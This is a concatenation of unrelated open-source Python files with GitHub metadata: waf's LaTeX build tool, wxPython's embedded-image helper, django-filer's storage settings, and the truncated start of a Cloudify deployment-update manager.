    """Scan the task's main input for \\putbib entries, resolving each to a node."""
    source = self.inputs[0]
    found_nodes = []
    if not source:
        return found_nodes
    text = source.read()
    for match in re_bibunit.finditer(text):
        path = match.group('file')
        if not path:
            continue
        # Probe the bare name and the .bib-suffixed name next to the source.
        for suffix in ('', '.bib'):
            Logs.debug('tex: trying %s%s' % (path, suffix))
            candidate = source.parent.find_resource(path + suffix)
            if candidate:
                found_nodes.append(candidate)
            else:
                Logs.debug('tex: could not find %s' % path)
    Logs.debug("tex: found the following bibunit files: %s" % found_nodes)
    return found_nodes
# Extensions probed, in order, when resolving a referenced tex dependency.
exts_deps_tex=['','.ltx','.tex','.bib','.pdf','.png','.eps','.ps','.sty']
# Extensions whose resolved files are themselves scanned recursively.
exts_tex=['.ltx','.tex']
# Matches the latex commands that pull in packages, files or graphics;
# 'type' is the command name, 'file' the comma-separated argument list.
re_tex=re.compile(r'\\(?P<type>usepackage|RequirePackage|include|bibliography([^\[\]{}]*)|putbib|includegraphics|input|import|bringin|lstinputlisting)(\[[^\[\]]*\])?{(?P<file>[^{}]*)}',re.M)
# Presence of \bibdata in an .aux file means bibtex must run.
g_bibtex_re=re.compile('bibdata',re.M)
# Presence of \@newglossary in an .aux file means makeglossaries must run.
g_glossaries_re=re.compile('\\@newglossary',re.M)
class tex(Task.Task):
bibtex_fun,_=Task.compile_fun('${BIBTEX} ${BIBTEXFLAGS} ${SRCFILE}',shell=False)
bibtex_fun.__doc__="""
Execute the program **bibtex**
"""
makeindex_fun,_=Task.compile_fun('${MAKEINDEX} ${MAKEINDEXFLAGS} ${SRCFILE}',shell=False)
makeindex_fun.__doc__="""
Execute the program **makeindex**
"""
makeglossaries_fun,_=Task.compile_fun('${MAKEGLOSSARIES} ${SRCFILE}',shell=False)
makeglossaries_fun.__doc__="""
Execute the program **makeglossaries**
"""
def exec_command(self,cmd,**kw):
bld=self.generator.bld
Logs.info('runner: %r'%cmd)
try:
if not kw.get('cwd',None):
kw['cwd']=bld.cwd
except AttributeError:
bld.cwd=kw['cwd']=bld.variant_dir
return Utils.subprocess.Popen(cmd,**kw).wait()
def scan_aux(self,node):
nodes=[node]
re_aux=re.compile(r'\\@input{(?P<file>[^{}]*)}',re.M)
def parse_node(node):
code=node.read()
for match in re_aux.finditer(code):
path=match.group('file')
found=node.parent.find_or_declare(path)
if found and found not in nodes:
Logs.debug('tex: found aux node '+found.abspath())
nodes.append(found)
parse_node(found)
parse_node(node)
return nodes
def scan(self):
node=self.inputs[0]
nodes=[]
names=[]
seen=[]
if not node:return(nodes,names)
def parse_node(node):
if node in seen:
return
seen.append(node)
code=node.read()
global re_tex
for match in re_tex.finditer(code):
multibib=match.group('type')
if multibib and multibib.startswith('bibliography'):
multibib=multibib[len('bibliography'):]
if multibib.startswith('style'):
continue
else:
multibib=None
for path in match.group('file').split(','):
if path:
add_name=True
found=None
for k in exts_deps_tex:
for up in self.texinputs_nodes:
Logs.debug('tex: trying %s%s'%(path,k))
found=up.find_resource(path+k)
if found:
break
for tsk in self.generator.tasks:
if not found or found in tsk.outputs:
break
else:
nodes.append(found)
add_name=False
for ext in exts_tex:
if found.name.endswith(ext):
parse_node(found)
break
if found and multibib and found.name.endswith('.bib'):
try:
self.multibibs.append(found)
except AttributeError:
self.multibibs=[found]
if add_name:
names.append(path)
parse_node(node)
for x in nodes:
x.parent.get_bld().mkdir()
Logs.debug("tex: found the following : %s and names %s"%(nodes,names))
return(nodes,names)
def check_status(self,msg,retcode):
if retcode!=0:
raise Errors.WafError("%r command exit status %r"%(msg,retcode))
def bibfile(self):
for aux_node in self.aux_nodes:
try:
ct=aux_node.read()
except EnvironmentError:
Logs.error('Error reading %s: %r'%aux_node.abspath())
continue
if g_bibtex_re.findall(ct):
Logs.info('calling bibtex')
self.env.env={}
self.env.env.update(os.environ)
self.env.env.update({'BIBINPUTS':self.texinputs(),'BSTINPUTS':self.texinputs()})
self.env.SRCFILE=aux_node.name[:-4]
self.check_status('error when calling bibtex',self.bibtex_fun())
for node in getattr(self,'multibibs',[]):
self.env.env={}
self.env.env.update(os.environ)
self.env.env.update({'BIBINPUTS':self.texinputs(),'BSTINPUTS':self.texinputs()})
self.env.SRCFILE=node.name[:-4]
self.check_status('error when calling bibtex',self.bibtex_fun())
def bibunits(self):
try:
bibunits=bibunitscan(self)
except OSError:
Logs.error('error bibunitscan')
else:
if bibunits:
fn=['bu'+str(i)for i in range(1,len(bibunits)+1)]
if fn:
Logs.info('calling bibtex on bibunits')
for f in fn:
self.env.env={'BIBINPUTS':self.texinputs(),'BSTINPUTS':self.texinputs()}
self.env.SRCFILE=f
self.check_status('error when calling bibtex',self.bibtex_fun())
def makeindex(self):
self.idx_node=self.inputs[0].change_ext('.idx')
try:
idx_path=self.idx_node.abspath()
os.stat(idx_path)
except OSError:
Logs.info('index file %s absent, not calling makeindex'%idx_path)
else:
Logs.info('calling makeindex')
self.env.SRCFILE=self.idx_node.name
self.env.env={}
self.check_status('error when calling makeindex %s'%idx_path,self.makeindex_fun())
def bibtopic(self):
p=self.inputs[0].parent.get_bld()
if os.path.exists(os.path.join(p.abspath(),'btaux.aux')):
self.aux_nodes+=p.ant_glob('*[0-9].aux')
def makeglossaries(self):
src_file=self.inputs[0].abspath()
base_file=os.path.basename(src_file)
base,_=os.path.splitext(base_file)
for aux_node in self.aux_nodes:
try:
ct=aux_node.read()
except EnvironmentError:
Logs.error('Error reading %s: %r'%aux_node.abspath())
continue
if g_glossaries_re.findall(ct):
if not self.env.MAKEGLOSSARIES:
raise Errors.WafError("The program 'makeglossaries' is missing!")
Logs.warn('calling makeglossaries')
self.env.SRCFILE=base
self.check_status('error when calling makeglossaries %s'%base,self.makeglossaries_fun())
return
def texinputs(self):
return os.pathsep.join([k.abspath()for k in self.texinputs_nodes])+os.pathsep
	def run(self):
		"""Execute the TeX build: one first pass, then bibliography/index/glossary
		processing, then re-run the tool until the aux files reach a fixed point
		(at most 10 additional passes).
		"""
		env=self.env
		if not env['PROMPT_LATEX']:
			# non-interactive builds must not block on latex error prompts
			env.append_value('LATEXFLAGS','-interaction=batchmode')
			env.append_value('PDFLATEXFLAGS','-interaction=batchmode')
			env.append_value('XELATEXFLAGS','-interaction=batchmode')
		self.cwd=self.inputs[0].parent.get_bld().abspath()
		Logs.info('first pass on %s'%self.__class__.__name__)
		cur_hash=self.hash_aux_nodes()
		self.call_latex()
		# the first pass may create or modify aux files; refresh their hashes
		self.hash_aux_nodes()
		self.bibtopic()
		self.bibfile()
		self.bibunits()
		self.makeindex()
		self.makeglossaries()
		for i in range(10):
			prev_hash=cur_hash
			cur_hash=self.hash_aux_nodes()
			if not cur_hash:
				Logs.error('No aux.h to process')
			if cur_hash and cur_hash==prev_hash:
				# aux files unchanged since last pass -> references are resolved
				break
			Logs.info('calling %s'%self.__class__.__name__)
			self.call_latex()
def hash_aux_nodes(self):
try:
self.aux_nodes
except AttributeError:
try:
self.aux_nodes=self.scan_aux(self.inputs[0].change_ext('.aux'))
except IOError:
return None
return Utils.h_list([Utils.h_file(x.abspath())for x in self.aux_nodes])
def call_latex(self):
self.env.env={}
self.env.env.update(os.environ)
self.env.env.update({'TEXINPUTS':self.texinputs()})
self.env.SRCFILE=self.inputs[0].abspath()
self.check_status('error when calling latex',self.texfun())
class latex(tex):
	# produce a .dvi file with plain latex
	texfun,vars=Task.compile_fun('${LATEX} ${LATEXFLAGS} ${SRCFILE}',shell=False)
class pdflatex(tex):
	# produce a .pdf file with pdflatex
	texfun,vars=Task.compile_fun('${PDFLATEX} ${PDFLATEXFLAGS} ${SRCFILE}',shell=False)
class xelatex(tex):
	# produce a .pdf file with xelatex
	texfun,vars=Task.compile_fun('${XELATEX} ${XELATEXFLAGS} ${SRCFILE}',shell=False)
class dvips(Task.Task):
	# convert .dvi output to postscript; must run after the tex tasks
	run_str='${DVIPS} ${DVIPSFLAGS} ${SRC} -o ${TGT}'
	color='BLUE'
	after=['latex','pdflatex','xelatex']
class dvipdf(Task.Task):
	# convert .dvi output to pdf; must run after the tex tasks
	run_str='${DVIPDF} ${DVIPDFFLAGS} ${SRC} ${TGT}'
	color='BLUE'
	after=['latex','pdflatex','xelatex']
class pdf2ps(Task.Task):
	# convert .pdf output to postscript; must run after the tex tasks
	run_str='${PDF2PS} ${PDF2PSFLAGS} ${SRC} ${TGT}'
	color='BLUE'
	after=['latex','pdflatex','xelatex']
@feature('tex')
@before_method('process_source')
def apply_tex(self):
	"""Create the latex/pdflatex/xelatex task for each source file of a 'tex'
	task generator, wire up extra dependencies and TEXINPUTS search paths, and
	add the conversion tasks (dvips/dvipdf/pdf2ps) requested through ``outs``.
	"""
	if not getattr(self,'type',None)in('latex','pdflatex','xelatex'):
		self.type='pdflatex'
	outs=Utils.to_list(getattr(self,'outs',[]))
	self.env['PROMPT_LATEX']=getattr(self,'prompt',1)
	# resolve the user-provided extra dependencies (strings or Node objects)
	deps_lst=[]
	if getattr(self,'deps',None):
		deps=self.to_list(self.deps)
		for dep in deps:
			if isinstance(dep,str):
				n=self.path.find_resource(dep)
				if not n:
					self.bld.fatal('Could not find %r for %r'%(dep,self))
				if not n in deps_lst:
					deps_lst.append(n)
			elif isinstance(dep,Node.Node):
				deps_lst.append(dep)
	for node in self.to_nodes(self.source):
		if self.type=='latex':
			task=self.create_task('latex',node,node.change_ext('.dvi'))
		elif self.type=='pdflatex':
			task=self.create_task('pdflatex',node,node.change_ext('.pdf'))
		elif self.type=='xelatex':
			task=self.create_task('xelatex',node,node.change_ext('.pdf'))
		task.env=self.env
		if deps_lst:
			for n in deps_lst:
				if not n in task.dep_nodes:
					task.dep_nodes.append(n)
		if hasattr(self,'texinputs_nodes'):
			task.texinputs_nodes=self.texinputs_nodes
		else:
			# default search path: source dir, its build dir, and the
			# generator path (source and build); then anything from TEXINPUTS
			task.texinputs_nodes=[node.parent,node.parent.get_bld(),self.path,self.path.get_bld()]
			lst=os.environ.get('TEXINPUTS','')
			if self.env.TEXINPUTS:
				lst+=os.pathsep+self.env.TEXINPUTS
			if lst:
				lst=lst.split(os.pathsep)
			for x in lst:
				if x:
					if os.path.isabs(x):
						p=self.bld.root.find_node(x)
						if p:
							task.texinputs_nodes.append(p)
						else:
							Logs.error('Invalid TEXINPUTS folder %s'%x)
					else:
						Logs.error('Cannot resolve relative paths in TEXINPUTS %s'%x)
		if self.type=='latex':
			if'ps'in outs:
				tsk=self.create_task('dvips',task.outputs,node.change_ext('.ps'))
				tsk.env.env=dict(os.environ)
			if'pdf'in outs:
				tsk=self.create_task('dvipdf',task.outputs,node.change_ext('.pdf'))
				tsk.env.env=dict(os.environ)
		elif self.type=='pdflatex':
			if'ps'in outs:
				self.create_task('pdf2ps',task.outputs,node.change_ext('.ps'))
	# the sources were consumed by the tex tasks; prevent further processing
	self.source=[]
def configure(self):
	"""Detect the TeX-related programs; tools that are not installed are simply skipped."""
	v=self.env
	programs=('tex','latex','pdflatex','xelatex','bibtex','dvips','dvipdf','ps2pdf','makeindex','pdf2ps','makeglossaries')
	for program in programs:
		try:
			self.find_program(program,var=program.upper())
		except self.errors.ConfigurationError:
			# optional tool, keep going
			pass
	v['DVIPSFLAGS']='-Ppdf'
|
{
"content_hash": "175f0314c936497b01e40a72ef6e1117",
"timestamp": "",
"source": "github",
"line_count": 313,
"max_line_length": 190,
"avg_line_length": 33.52076677316294,
"alnum_prop": 0.6629813191002669,
"repo_name": "softDi/clusim",
"id": "a91fd9119f79dee7be47a2f6fce197c34abdb0ef",
"size": "10613",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "ns3/ns-3.26/.waf-1.8.19-b1fc8f7baef51bd2db4c2971909a568d/waflib/Tools/tex.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3021"
},
{
"name": "C",
"bytes": "365226"
},
{
"name": "C++",
"bytes": "24340132"
},
{
"name": "CSS",
"bytes": "3775"
},
{
"name": "Click",
"bytes": "19348"
},
{
"name": "Gnuplot",
"bytes": "9919"
},
{
"name": "HTML",
"bytes": "7942"
},
{
"name": "JavaScript",
"bytes": "7698"
},
{
"name": "Makefile",
"bytes": "92131"
},
{
"name": "Matlab",
"bytes": "39069"
},
{
"name": "Perl",
"bytes": "302716"
},
{
"name": "Perl 6",
"bytes": "151"
},
{
"name": "Python",
"bytes": "44191047"
},
{
"name": "QMake",
"bytes": "6602"
},
{
"name": "Shell",
"bytes": "146434"
}
],
"symlink_target": ""
}
|
import base64
import cStringIO
import wx
try:
    b64decode = base64.b64decode
except AttributeError:
    # very old Python versions do not have b64decode; fall back to the
    # legacy decodestring API
    b64decode = base64.decodestring
class PyEmbeddedImage(object):
    """
    PyEmbeddedImage is primarily intended to be used by code generated
    by img2py as a means of embedding image data in a python module so
    the image can be used at runtime without needing to access the
    image from an image file.  This makes distributing icons and such
    that an application uses simpler since tools like py2exe will
    automatically bundle modules that are imported, and the
    application doesn't have to worry about how to locate the image
    files on the user's filesystem.

    The class can also be used for image data that may be acquired
    from some other source at runtime, such as over the network or
    from a database.  In this case pass False for isBase64 (unless the
    data actually is base64 encoded.)  Any image type that
    wx.ImageFromStream can handle should be okay.
    """

    def __init__(self, data, isBase64=True):
        # data: the raw image bytes, base64-encoded when isBase64 is True
        self.data = data
        self.isBase64 = isBase64

    def GetBitmap(self):
        """Return the embedded image as a wx.Bitmap."""
        return wx.BitmapFromImage(self.GetImage())

    def GetData(self):
        """Return the raw (decoded) image bytes."""
        data = self.data
        if self.isBase64:
            data = b64decode(self.data)
        return data

    def GetIcon(self):
        """Return the embedded image as a wx.Icon."""
        icon = wx.EmptyIcon()
        icon.CopyFromBitmap(self.GetBitmap())
        return icon

    def GetImage(self):
        """Return the embedded image as a wx.Image, parsed from the decoded bytes."""
        stream = cStringIO.StringIO(self.GetData())
        return wx.ImageFromStream(stream)

    # added for backwards compatibility
    getBitmap = GetBitmap
    getData = GetData
    getIcon = GetIcon
    getImage = GetImage

    # define properties, for convenience
    Bitmap = property(GetBitmap)
    Icon = property(GetIcon)
    Image = property(GetImage)
|
{
"content_hash": "882c1f69009cc6c2f046cca6abfd86e1",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 70,
"avg_line_length": 30.725806451612904,
"alnum_prop": 0.6677165354330709,
"repo_name": "ktan2020/legacy-automation",
"id": "abf25b814866e3f1bfe9cad7138f64c656de9893",
"size": "2451",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "win/Lib/site-packages/wx-3.0-msw/wx/lib/embeddedimage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "ActionScript",
"bytes": "913"
},
{
"name": "Ada",
"bytes": "289"
},
{
"name": "Assembly",
"bytes": "687"
},
{
"name": "Boo",
"bytes": "540"
},
{
"name": "C",
"bytes": "40116"
},
{
"name": "C#",
"bytes": "474"
},
{
"name": "C++",
"bytes": "393"
},
{
"name": "CSS",
"bytes": "70883"
},
{
"name": "ColdFusion",
"bytes": "1012"
},
{
"name": "Common Lisp",
"bytes": "1034"
},
{
"name": "D",
"bytes": "1858"
},
{
"name": "Eiffel",
"bytes": "426"
},
{
"name": "Erlang",
"bytes": "9243"
},
{
"name": "FORTRAN",
"bytes": "1810"
},
{
"name": "Forth",
"bytes": "182"
},
{
"name": "Groovy",
"bytes": "2366"
},
{
"name": "Haskell",
"bytes": "816"
},
{
"name": "Haxe",
"bytes": "455"
},
{
"name": "Java",
"bytes": "1155"
},
{
"name": "JavaScript",
"bytes": "69444"
},
{
"name": "Lua",
"bytes": "795"
},
{
"name": "Matlab",
"bytes": "1278"
},
{
"name": "OCaml",
"bytes": "350"
},
{
"name": "Objective-C++",
"bytes": "885"
},
{
"name": "PHP",
"bytes": "1411"
},
{
"name": "Pascal",
"bytes": "388"
},
{
"name": "Perl",
"bytes": "252651"
},
{
"name": "Pike",
"bytes": "589"
},
{
"name": "Python",
"bytes": "42085780"
},
{
"name": "R",
"bytes": "1156"
},
{
"name": "Ruby",
"bytes": "480"
},
{
"name": "Scheme",
"bytes": "282"
},
{
"name": "Shell",
"bytes": "30518"
},
{
"name": "Smalltalk",
"bytes": "926"
},
{
"name": "Squirrel",
"bytes": "697"
},
{
"name": "Stata",
"bytes": "302"
},
{
"name": "SystemVerilog",
"bytes": "3145"
},
{
"name": "Tcl",
"bytes": "1039"
},
{
"name": "TeX",
"bytes": "1746"
},
{
"name": "VHDL",
"bytes": "985"
},
{
"name": "Vala",
"bytes": "664"
},
{
"name": "Verilog",
"bytes": "439"
},
{
"name": "Visual Basic",
"bytes": "2142"
},
{
"name": "XSLT",
"bytes": "152770"
},
{
"name": "ooc",
"bytes": "890"
},
{
"name": "xBase",
"bytes": "769"
}
],
"symlink_target": ""
}
|
from django.conf import settings
from django.core.files.storage import get_storage_class
from filer.utils.loader import load_object
from filer.utils.recursive_dictionary import RecursiveDictionaryWithExcludes
import os
# Dotted path of a swappable image model; False means use filer's bundled Image.
FILER_IMAGE_MODEL = getattr(settings, 'FILER_IMAGE_MODEL', False)
FILER_DEBUG = getattr(settings, 'FILER_DEBUG', False)  # NOTE(review): original comment was truncated ("When True makes"); presumably enables debug behaviour - confirm
FILER_SUBJECT_LOCATION_IMAGE_DEBUG = getattr(settings, 'FILER_SUBJECT_LOCATION_IMAGE_DEBUG', False)
FILER_WHITESPACE_COLOR = getattr(settings, 'FILER_WHITESPACE_COLOR', '#FFFFFF')
FILER_0_8_COMPATIBILITY_MODE = getattr(settings, 'FILER_0_8_COMPATIBILITY_MODE', False)
FILER_ENABLE_LOGGING = getattr(settings, 'FILER_ENABLE_LOGGING', False)
if FILER_ENABLE_LOGGING:
    # only keep logging on when the project LOGGING config defines a root ('')
    # or a 'filer' logger
    FILER_ENABLE_LOGGING = (
        FILER_ENABLE_LOGGING and (getattr(settings, 'LOGGING') and
                                  ('' in settings.LOGGING['loggers'] or
                                   'filer' in settings.LOGGING['loggers'])))
FILER_ENABLE_PERMISSIONS = getattr(settings, 'FILER_ENABLE_PERMISSIONS', False)
FILER_ALLOW_REGULAR_USERS_TO_ADD_ROOT_FOLDERS = getattr(settings, 'FILER_ALLOW_REGULAR_USERS_TO_ADD_ROOT_FOLDERS', False)
FILER_IS_PUBLIC_DEFAULT = getattr(settings, 'FILER_IS_PUBLIC_DEFAULT', True)
FILER_PAGINATE_BY = getattr(settings, 'FILER_PAGINATE_BY', 20)
FILER_ADMIN_ICON_SIZES = getattr(settings,"FILER_ADMIN_ICON_SIZES", (
    '16', '32', '48', '64',
))
# This is an ordered iterable that describes a list of
# classes that I should check for when adding files
FILER_FILE_MODELS = getattr(settings, 'FILER_FILE_MODELS', (
    FILER_IMAGE_MODEL if FILER_IMAGE_MODEL else 'filer.models.imagemodels.Image',
    'filer.models.filemodels.File',))
DEFAULT_FILE_STORAGE = getattr(settings, 'DEFAULT_FILE_STORAGE', 'django.core.files.storage.FileSystemStorage')
# Skeleton of the storage configuration: every section exists, but engines are
# unset (None) so they can be filled from DEFAULT_FILER_STORAGES later.
MINIMAL_FILER_STORAGES = {
    'public': {
        'main': {
            'ENGINE': None,
            'OPTIONS': {},
        },
        'thumbnails': {
            'ENGINE': None,
            'OPTIONS': {},
        }
    },
    'private': {
        'main': {
            'ENGINE': None,
            'OPTIONS': {},
        },
        'thumbnails': {
            'ENGINE': None,
            'OPTIONS': {},
        },
    },
}
# Fallback values used by update_storage_settings() for anything the user
# did not configure in settings.FILER_STORAGES.
DEFAULT_FILER_STORAGES = {
    'public': {
        'main': {
            'ENGINE': DEFAULT_FILE_STORAGE,
            'OPTIONS': {},
            'UPLOAD_TO': 'filer.utils.generate_filename.randomized',
            'UPLOAD_TO_PREFIX': 'filer_public',
        },
        'thumbnails': {
            'ENGINE': DEFAULT_FILE_STORAGE,
            'OPTIONS': {},
            'THUMBNAIL_OPTIONS': {
                'base_dir': 'filer_public_thumbnails',
            },
        },
    },
    'private': {
        'main': {
            'ENGINE': 'filer.storage.PrivateFileSystemStorage',
            'OPTIONS': {
                'location': os.path.abspath(os.path.join(settings.MEDIA_ROOT, '../smedia/filer_private')),
                'base_url': '/smedia/filer_private/',
            },
            'UPLOAD_TO': 'filer.utils.generate_filename.randomized',
            'UPLOAD_TO_PREFIX': '',
        },
        'thumbnails': {
            'ENGINE': 'filer.storage.PrivateFileSystemStorage',
            'OPTIONS': {
                'location': os.path.abspath(os.path.join(settings.MEDIA_ROOT, '../smedia/filer_private_thumbnails')),
                'base_url': '/smedia/filer_private_thumbnails/',
            },
            'THUMBNAIL_OPTIONS': {},
        },
    },
}
# Same skeleton/default split for the private-file serving backends.
MINIMAL_FILER_SERVERS = {
    'private': {
        'main': {
            'ENGINE': None,
            'OPTIONS': {},
        },
        'thumbnails': {
            'ENGINE': None,
            'OPTIONS': {},
        },
    },
}
DEFAULT_FILER_SERVERS = {
    'private': {
        'main': {
            'ENGINE': 'filer.server.backends.default.DefaultServer',
            'OPTIONS': {},
        },
        'thumbnails': {
            'ENGINE': 'filer.server.backends.default.DefaultServer',
            'OPTIONS': {},
        },
    },
}
# Start from the minimal skeleton, then overlay the user configuration;
# OPTIONS/THUMBNAIL_OPTIONS are replaced wholesale rather than merged.
FILER_STORAGES = RecursiveDictionaryWithExcludes(MINIMAL_FILER_STORAGES, rec_excluded_keys=('OPTIONS', 'THUMBNAIL_OPTIONS'))
if FILER_0_8_COMPATIBILITY_MODE:
    # map the old 0.8-era FILER_PUBLICMEDIA_PREFIX/FILER_PRIVATEMEDIA_PREFIX
    # settings onto the current FILER_STORAGES structure
    user_filer_storages = {
        'public': {
            'main': {
                'ENGINE': DEFAULT_FILE_STORAGE,
                'UPLOAD_TO': 'filer.utils.generate_filename.randomized',
                'UPLOAD_TO_PREFIX': getattr(settings, 'FILER_PUBLICMEDIA_PREFIX', 'filer_public'),
            },
            'thumbnails': {
                'ENGINE': DEFAULT_FILE_STORAGE,
                'OPTIONS': {},
                'THUMBNAIL_OPTIONS': {
                    'base_dir': 'filer_public_thumbnails',
                },
            },
        },
        'private': {
            'main': {
                'ENGINE': DEFAULT_FILE_STORAGE,
                'UPLOAD_TO': 'filer.utils.generate_filename.randomized',
                'UPLOAD_TO_PREFIX': getattr(settings, 'FILER_PRIVATEMEDIA_PREFIX', 'filer_private'),
            },
            'thumbnails': {
                'ENGINE': DEFAULT_FILE_STORAGE,
                'OPTIONS': {},
                'THUMBNAIL_OPTIONS': {
                    'base_dir': 'filer_private_thumbnails',
                },
            },
        },
    }
else:
    user_filer_storages = getattr(settings, 'FILER_STORAGES', {})
FILER_STORAGES.rec_update(user_filer_storages)
def update_storage_settings(user_settings, defaults, s, t):
    """Fill missing pieces of the storage section ``user_settings[s][t]`` in place.

    When the user left ENGINE unset, both ENGINE and OPTIONS are taken from
    ``defaults``.  For 'main' sections, UPLOAD_TO and UPLOAD_TO_PREFIX are
    defaulted individually when absent; for 'thumbnails' sections the same is
    done for THUMBNAIL_OPTIONS.  The (mutated) user_settings is returned.
    """
    section = user_settings[s][t]
    default_section = defaults[s][t]
    if not section['ENGINE']:
        section['ENGINE'] = default_section['ENGINE']
        section['OPTIONS'] = default_section['OPTIONS']
    if t == 'main':
        for key in ('UPLOAD_TO', 'UPLOAD_TO_PREFIX'):
            if key not in section:
                section[key] = default_section[key]
    if t == 'thumbnails':
        if 'THUMBNAIL_OPTIONS' not in section:
            section['THUMBNAIL_OPTIONS'] = default_section['THUMBNAIL_OPTIONS']
    return user_settings
# Apply the defaults to every storage section the user did not fully configure.
update_storage_settings(FILER_STORAGES, DEFAULT_FILER_STORAGES, 'public', 'main')
update_storage_settings(FILER_STORAGES, DEFAULT_FILER_STORAGES, 'public', 'thumbnails')
update_storage_settings(FILER_STORAGES, DEFAULT_FILER_STORAGES, 'private', 'main')
update_storage_settings(FILER_STORAGES, DEFAULT_FILER_STORAGES, 'private', 'thumbnails')
# Same merge strategy for the private-file server backends.
FILER_SERVERS = RecursiveDictionaryWithExcludes(MINIMAL_FILER_SERVERS, rec_excluded_keys=('OPTIONS',))
FILER_SERVERS.rec_update(getattr(settings, 'FILER_SERVERS', {}))
def update_server_settings(settings, defaults, s, t):
    """Default the ENGINE and OPTIONS of server section ``settings[s][t]`` in
    place when no ENGINE was configured; return the (mutated) settings.
    """
    section = settings[s][t]
    if not section['ENGINE']:
        section['ENGINE'] = defaults[s][t]['ENGINE']
        section['OPTIONS'] = defaults[s][t]['OPTIONS']
    return settings
update_server_settings(FILER_SERVERS, DEFAULT_FILER_SERVERS, 'private', 'main')
update_server_settings(FILER_SERVERS, DEFAULT_FILER_SERVERS, 'private', 'thumbnails')
# Public media (media accessible without any permission checks)
FILER_PUBLICMEDIA_STORAGE = get_storage_class(FILER_STORAGES['public']['main']['ENGINE'])(**FILER_STORAGES['public']['main']['OPTIONS'])
FILER_PUBLICMEDIA_UPLOAD_TO = load_object(FILER_STORAGES['public']['main']['UPLOAD_TO'])
if 'UPLOAD_TO_PREFIX' in FILER_STORAGES['public']['main']:
    # wrap the upload-to callable so all generated paths get the prefix
    FILER_PUBLICMEDIA_UPLOAD_TO = load_object('filer.utils.generate_filename.prefixed_factory')(FILER_PUBLICMEDIA_UPLOAD_TO, FILER_STORAGES['public']['main']['UPLOAD_TO_PREFIX'])
FILER_PUBLICMEDIA_THUMBNAIL_STORAGE = get_storage_class(FILER_STORAGES['public']['thumbnails']['ENGINE'])(**FILER_STORAGES['public']['thumbnails']['OPTIONS'])
FILER_PUBLICMEDIA_THUMBNAIL_OPTIONS = FILER_STORAGES['public']['thumbnails']['THUMBNAIL_OPTIONS']
# Private media (media accessible through permissions checks)
FILER_PRIVATEMEDIA_STORAGE = get_storage_class(FILER_STORAGES['private']['main']['ENGINE'])(**FILER_STORAGES['private']['main']['OPTIONS'])
FILER_PRIVATEMEDIA_UPLOAD_TO = load_object(FILER_STORAGES['private']['main']['UPLOAD_TO'])
if 'UPLOAD_TO_PREFIX' in FILER_STORAGES['private']['main']:
    FILER_PRIVATEMEDIA_UPLOAD_TO = load_object('filer.utils.generate_filename.prefixed_factory')(FILER_PRIVATEMEDIA_UPLOAD_TO, FILER_STORAGES['private']['main']['UPLOAD_TO_PREFIX'])
FILER_PRIVATEMEDIA_THUMBNAIL_STORAGE = get_storage_class(FILER_STORAGES['private']['thumbnails']['ENGINE'])(**FILER_STORAGES['private']['thumbnails']['OPTIONS'])
FILER_PRIVATEMEDIA_THUMBNAIL_OPTIONS = FILER_STORAGES['private']['thumbnails']['THUMBNAIL_OPTIONS']
FILER_PRIVATEMEDIA_SERVER = load_object(FILER_SERVERS['private']['main']['ENGINE'])(**FILER_SERVERS['private']['main']['OPTIONS'])
FILER_PRIVATEMEDIA_THUMBNAIL_SERVER = load_object(FILER_SERVERS['private']['thumbnails']['ENGINE'])(**FILER_SERVERS['private']['thumbnails']['OPTIONS'])
FILER_DUMP_PAYLOAD = getattr(settings, 'FILER_DUMP_PAYLOAD', False)  # Whether the filer shall dump the files payload
FILER_CANONICAL_URL = getattr(settings, 'FILER_CANONICAL_URL', 'canonical/')
|
{
"content_hash": "48f854e30cca3501af8ae3713e048908",
"timestamp": "",
"source": "github",
"line_count": 218,
"max_line_length": 181,
"avg_line_length": 41.87614678899082,
"alnum_prop": 0.6155110088728228,
"repo_name": "Venturi/oldcms",
"id": "a5ea0cfdf020524bfb311e3641e65e3c83914478",
"size": "9154",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "env/lib/python2.7/site-packages/filer/settings.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "40171"
},
{
"name": "CSS",
"bytes": "418090"
},
{
"name": "HTML",
"bytes": "467117"
},
{
"name": "JavaScript",
"bytes": "916100"
},
{
"name": "PHP",
"bytes": "2231"
},
{
"name": "Python",
"bytes": "15786894"
},
{
"name": "Ruby",
"bytes": "990"
},
{
"name": "Shell",
"bytes": "3743"
},
{
"name": "XSLT",
"bytes": "157892"
}
],
"symlink_target": ""
}
|
import copy
import os
import uuid
from flask import current_app
from dsl_parser import constants, tasks
from dsl_parser import exceptions as parser_exceptions
from manager_rest import config
from manager_rest.constants import CURRENT_TENANT_CONFIG
from manager_rest import app_context, manager_exceptions
from manager_rest.storage import get_storage_manager, models
from manager_rest.storage.models_states import ExecutionState
from manager_rest import workflow_executor
from manager_rest import utils
from manager_rest.resource_manager import ResourceManager
from manager_rest.deployment_update import step_extractor
from manager_rest.deployment_update.utils import extract_ids
from manager_rest.deployment_update.validator import StepValidator
from manager_rest.deployment_update.constants import (
STATES,
NODE_MOD_TYPES,
DEFAULT_DEPLOYMENT_UPDATE_WORKFLOW
)
from manager_rest.deployment_update.handlers import (
DeploymentUpdateNodeHandler,
DeploymentUpdateNodeInstanceHandler,
DeploymentUpdateDeploymentHandler
)
class DeploymentUpdateManager(object):
def __init__(self):
self.sm = get_storage_manager()
self._node_handler = DeploymentUpdateNodeHandler()
self._node_instance_handler = DeploymentUpdateNodeInstanceHandler()
self._deployment_handler = DeploymentUpdateDeploymentHandler()
self._step_validator = StepValidator()
def get_deployment_update(self, deployment_update_id):
"""Return the deployment update object
:param deployment_update_id:
:return:
"""
return self.sm.get(models.DeploymentUpdate, deployment_update_id)
def list_deployment_updates(self, include=None, filters=None,
pagination=None, sort=None):
"""Return a list of deployment updates.
:param include:
:param filters:
:param pagination:
:param sort:
:return:
"""
return self.sm.list(
models.DeploymentUpdate,
include=include,
filters=filters,
pagination=pagination,
sort=sort
)
def stage_deployment_update(self,
deployment_id,
app_dir,
app_blueprint,
additional_inputs):
"""Stage a deployment update
:param app_blueprint:
:param app_dir:
:param deployment_id: the deployment id for the update
:return:
"""
# enables reverting to original blueprint resources
deployment = self.sm.get(models.Deployment, deployment_id)
blueprint_id = deployment.blueprint_id
